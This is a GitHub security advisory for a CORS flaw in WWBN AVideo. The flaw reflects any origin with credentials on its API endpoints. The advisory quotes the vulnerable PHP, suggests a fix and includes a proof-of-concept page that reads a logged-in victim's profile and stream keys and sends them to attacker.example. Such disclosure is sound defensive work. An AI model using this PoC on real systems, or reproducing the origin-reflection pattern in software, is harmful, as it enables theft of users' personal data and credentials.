GHSA-CCQ9-R5CW-5HWQ

Vulnerability from github – Published: 2026-04-14 23:18 – Updated: 2026-04-14 23:18
VLAI?
Summary
WWBN AVideo has CORS Origin Reflection with Credentials on Sensitive API Endpoints Enables Cross-Origin Account Takeover
Details

Summary

The allowOrigin($allowAll=true) function in objects/functions.php reflects any arbitrary Origin header back in Access-Control-Allow-Origin along with Access-Control-Allow-Credentials: true. This function is called by both plugin/API/get.json.php and plugin/API/set.json.php — the primary API endpoints that handle user data retrieval, authentication, livestream credentials, and state-changing operations. Combined with the application's SameSite=None session cookie policy, any website can make credentialed cross-origin requests and read authenticated API responses, enabling theft of user PII, livestream keys, and performing state changes on behalf of the victim.

Details

The vulnerable code path is in objects/functions.php lines 2773-2791:

// objects/functions.php:2773
if ($allowAll) {
    $requestOrigin = $_SERVER['HTTP_ORIGIN'] ?? '';
    if (!empty($requestOrigin)) {
        header('Access-Control-Allow-Origin: ' . $requestOrigin);
        header('Access-Control-Allow-Credentials: true');
    } else {
        header('Access-Control-Allow-Origin: *');
    }
    // ... allows all methods and headers ...
    return;
}

This is called unconditionally at the top of both API entry points:

// plugin/API/get.json.php:12
allowOrigin(true);

// plugin/API/set.json.php:12
allowOrigin(true);

The comment above the code claims "These endpoints return public ad XML and carry no session-sensitive data" — this is incorrect. The same allowOrigin(true) call gates the entire API surface.

The attack is enabled by the session cookie configuration at objects/include_config.php:144:

ini_set('session.cookie_samesite', 'None');

This ensures the browser sends the victim's session cookie on cross-origin requests, which the API then uses for authentication via $_SESSION['user']['id'] (in User::getId()).

When a logged-in user's session is present, the get_api_user endpoint (API.php:3009) returns full user data without sanitization for the user's own profile ($isViewingOwnProfile = true bypasses removeSensitiveUserFields), including: - Email, full name, address, phone, birth date (PII) - Admin status and permission flags - Livestream server URL with embedded password (API.php:3059) - Encrypted stream key (API.php:3063)

The recent fix in commit 986e64aad addressed CORS handling in the non-$allowAll path (null origin and trusted subdomains) but left this far more dangerous $allowAll=true path completely untouched.

PoC

Step 1: Host the following HTML on any domain (e.g., https://attacker.example):

<html>
<body>
<h1>AVideo CORS PoC</h1>
<script>
// Step 1: Steal user profile data (PII, admin status, stream keys)
fetch('https://TARGET/plugin/API/get.json.php?APIName=user', {
  credentials: 'include'
})
.then(r => r.json())
.then(data => {
  document.getElementById('result').textContent = JSON.stringify(data, null, 2);
  // Exfiltrate to attacker server
  navigator.sendBeacon('https://attacker.example/collect',
    JSON.stringify({
      email: data.user?.email,
      name: data.user?.user,
      isAdmin: data.user?.isAdmin,
      streamKey: data.livestream?.key,
      streamServer: data.livestream?.server
    })
  );
});
</script>
<pre id="result">Loading...</pre>
</body>
</html>

Step 2: Victim visits the attacker page while logged into the AVideo instance.

Step 3: The browser sends a credentialed cross-origin GET request to the API. The server responds with:

Access-Control-Allow-Origin: https://attacker.example
Access-Control-Allow-Credentials: true

Step 4: The attacker's JavaScript reads the full authenticated API response containing the victim's email, name, address, phone, admin status, livestream credentials, and stream keys.

Step 5 (optional escalation): The attacker can also invoke set.json.php endpoints to perform state changes on behalf of the victim.

Impact

  • User PII theft: Email, full name, address, phone number, birth date of any logged-in user who visits an attacker-controlled page
  • Account compromise: Livestream server credentials (including password) and stream keys are exposed, allowing stream hijacking
  • Admin reconnaissance: Admin status and all permission flags are exposed, enabling targeted attacks on privileged accounts
  • State modification: The set.json.php endpoint is equally affected, allowing attackers to perform write operations (video management, settings changes) on behalf of the victim
  • Mass exploitation: No per-user targeting required — a single attacker page can harvest data from every logged-in visitor

Recommended Fix

Replace the permissive origin reflection in allowOrigin() with validation against the site's configured domain. The $allowAll path should validate the origin the same way the non-$allowAll path does:

// objects/functions.php:2773 — replace the $allowAll block with:
if ($allowAll) {
    $requestOrigin = $_SERVER['HTTP_ORIGIN'] ?? '';
    if (!empty($requestOrigin)) {
        // Validate origin against site domain before reflecting
        $siteOrigin = '';
        if (!empty($global['webSiteRootURL'])) {
            $parsed = parse_url($global['webSiteRootURL']);
            if (!empty($parsed['scheme']) && !empty($parsed['host'])) {
                $siteOrigin = $parsed['scheme'] . '://' . $parsed['host'];
                if (!empty($parsed['port'])) {
                    $siteOrigin .= ':' . $parsed['port'];
                }
            }
        }
        if ($requestOrigin === $siteOrigin) {
            header('Access-Control-Allow-Origin: ' . $requestOrigin);
            header('Access-Control-Allow-Credentials: true');
        } else {
            // For truly public resources (ad XML), allow without credentials
            header('Access-Control-Allow-Origin: ' . $requestOrigin);
            // Do NOT set Allow-Credentials for untrusted origins
        }
    } else {
        header('Access-Control-Allow-Origin: *');
    }
    // ... rest of headers ...
}

Additionally, consider separating the truly public endpoints (VAST/VMAP ad XML) from the sensitive API endpoints so they can have different CORS policies, rather than sharing one permissive allowOrigin(true) call.

Severity ?
8.1 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "29.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-942"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-14T23:18:19Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe `allowOrigin($allowAll=true)` function in `objects/functions.php` reflects any arbitrary `Origin` header back in `Access-Control-Allow-Origin` along with `Access-Control-Allow-Credentials: true`. This function is called by both `plugin/API/get.json.php` and `plugin/API/set.json.php` \u2014 the primary API endpoints that handle user data retrieval, authentication, livestream credentials, and state-changing operations. Combined with the application\u0027s `SameSite=None` session cookie policy, any website can make credentialed cross-origin requests and read authenticated API responses, enabling theft of user PII, livestream keys, and performing state changes on behalf of the victim.\n\n## Details\n\nThe vulnerable code path is in `objects/functions.php` lines 2773-2791:\n\n```php\n// objects/functions.php:2773\nif ($allowAll) {\n    $requestOrigin = $_SERVER[\u0027HTTP_ORIGIN\u0027] ?? \u0027\u0027;\n    if (!empty($requestOrigin)) {\n        header(\u0027Access-Control-Allow-Origin: \u0027 . $requestOrigin);\n        header(\u0027Access-Control-Allow-Credentials: true\u0027);\n    } else {\n        header(\u0027Access-Control-Allow-Origin: *\u0027);\n    }\n    // ... allows all methods and headers ...\n    return;\n}\n```\n\nThis is called unconditionally at the top of both API entry points:\n\n```php\n// plugin/API/get.json.php:12\nallowOrigin(true);\n\n// plugin/API/set.json.php:12\nallowOrigin(true);\n```\n\nThe comment above the code claims \"These endpoints return public ad XML and carry no session-sensitive data\" \u2014 this is incorrect. The same `allowOrigin(true)` call gates the entire API surface.\n\nThe attack is enabled by the session cookie configuration at `objects/include_config.php:144`:\n\n```php\nini_set(\u0027session.cookie_samesite\u0027, \u0027None\u0027);\n```\n\nThis ensures the browser sends the victim\u0027s session cookie on cross-origin requests, which the API then uses for authentication via `$_SESSION[\u0027user\u0027][\u0027id\u0027]` (in `User::getId()`).\n\nWhen a logged-in user\u0027s session is present, the `get_api_user` endpoint (API.php:3009) returns full user data without sanitization for the user\u0027s own profile (`$isViewingOwnProfile = true` bypasses `removeSensitiveUserFields`), including:\n- Email, full name, address, phone, birth date (PII)\n- Admin status and permission flags\n- Livestream server URL with embedded password (API.php:3059)\n- Encrypted stream key (API.php:3063)\n\nThe recent fix in commit `986e64aad` addressed CORS handling in the non-`$allowAll` path (null origin and trusted subdomains) but left this far more dangerous `$allowAll=true` path completely untouched.\n\n## PoC\n\n**Step 1:** Host the following HTML on any domain (e.g., `https://attacker.example`):\n\n```html\n\u003chtml\u003e\n\u003cbody\u003e\n\u003ch1\u003eAVideo CORS PoC\u003c/h1\u003e\n\u003cscript\u003e\n// Step 1: Steal user profile data (PII, admin status, stream keys)\nfetch(\u0027https://TARGET/plugin/API/get.json.php?APIName=user\u0027, {\n  credentials: \u0027include\u0027\n})\n.then(r =\u003e r.json())\n.then(data =\u003e {\n  document.getElementById(\u0027result\u0027).textContent = JSON.stringify(data, null, 2);\n  // Exfiltrate to attacker server\n  navigator.sendBeacon(\u0027https://attacker.example/collect\u0027,\n    JSON.stringify({\n      email: data.user?.email,\n      name: data.user?.user,\n      isAdmin: data.user?.isAdmin,\n      streamKey: data.livestream?.key,\n      streamServer: data.livestream?.server\n    })\n  );\n});\n\u003c/script\u003e\n\u003cpre id=\"result\"\u003eLoading...\u003c/pre\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n\n**Step 2:** Victim visits the attacker page while logged into the AVideo instance.\n\n**Step 3:** The browser sends a credentialed cross-origin GET request to the API. The server responds with:\n```\nAccess-Control-Allow-Origin: https://attacker.example\nAccess-Control-Allow-Credentials: true\n```\n\n**Step 4:** The attacker\u0027s JavaScript reads the full authenticated API response containing the victim\u0027s email, name, address, phone, admin status, livestream credentials, and stream keys.\n\n**Step 5 (optional escalation):** The attacker can also invoke `set.json.php` endpoints to perform state changes on behalf of the victim.\n\n## Impact\n\n- **User PII theft**: Email, full name, address, phone number, birth date of any logged-in user who visits an attacker-controlled page\n- **Account compromise**: Livestream server credentials (including password) and stream keys are exposed, allowing stream hijacking\n- **Admin reconnaissance**: Admin status and all permission flags are exposed, enabling targeted attacks on privileged accounts\n- **State modification**: The `set.json.php` endpoint is equally affected, allowing attackers to perform write operations (video management, settings changes) on behalf of the victim\n- **Mass exploitation**: No per-user targeting required \u2014 a single attacker page can harvest data from every logged-in visitor\n\n## Recommended Fix\n\nReplace the permissive origin reflection in `allowOrigin()` with validation against the site\u0027s configured domain. The `$allowAll` path should validate the origin the same way the non-`$allowAll` path does:\n\n```php\n// objects/functions.php:2773 \u2014 replace the $allowAll block with:\nif ($allowAll) {\n    $requestOrigin = $_SERVER[\u0027HTTP_ORIGIN\u0027] ?? \u0027\u0027;\n    if (!empty($requestOrigin)) {\n        // Validate origin against site domain before reflecting\n        $siteOrigin = \u0027\u0027;\n        if (!empty($global[\u0027webSiteRootURL\u0027])) {\n            $parsed = parse_url($global[\u0027webSiteRootURL\u0027]);\n            if (!empty($parsed[\u0027scheme\u0027]) \u0026\u0026 !empty($parsed[\u0027host\u0027])) {\n                $siteOrigin = $parsed[\u0027scheme\u0027] . \u0027://\u0027 . $parsed[\u0027host\u0027];\n                if (!empty($parsed[\u0027port\u0027])) {\n                    $siteOrigin .= \u0027:\u0027 . $parsed[\u0027port\u0027];\n                }\n            }\n        }\n        if ($requestOrigin === $siteOrigin) {\n            header(\u0027Access-Control-Allow-Origin: \u0027 . $requestOrigin);\n            header(\u0027Access-Control-Allow-Credentials: true\u0027);\n        } else {\n            // For truly public resources (ad XML), allow without credentials\n            header(\u0027Access-Control-Allow-Origin: \u0027 . $requestOrigin);\n            // Do NOT set Allow-Credentials for untrusted origins\n        }\n    } else {\n        header(\u0027Access-Control-Allow-Origin: *\u0027);\n    }\n    // ... rest of headers ...\n}\n```\n\nAdditionally, consider separating the truly public endpoints (VAST/VMAP ad XML) from the sensitive API endpoints so they can have different CORS policies, rather than sharing one permissive `allowOrigin(true)` call.",
  "id": "GHSA-ccq9-r5cw-5hwq",
  "modified": "2026-04-14T23:18:19Z",
  "published": "2026-04-14T23:18:19Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-ccq9-r5cw-5hwq"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/caf705f38eae0ccfac4c3af1587781355d24495e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "WWBN AVideo has CORS Origin Reflection with Credentials on Sensitive API Endpoints Enables Cross-Origin Account Takeover"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.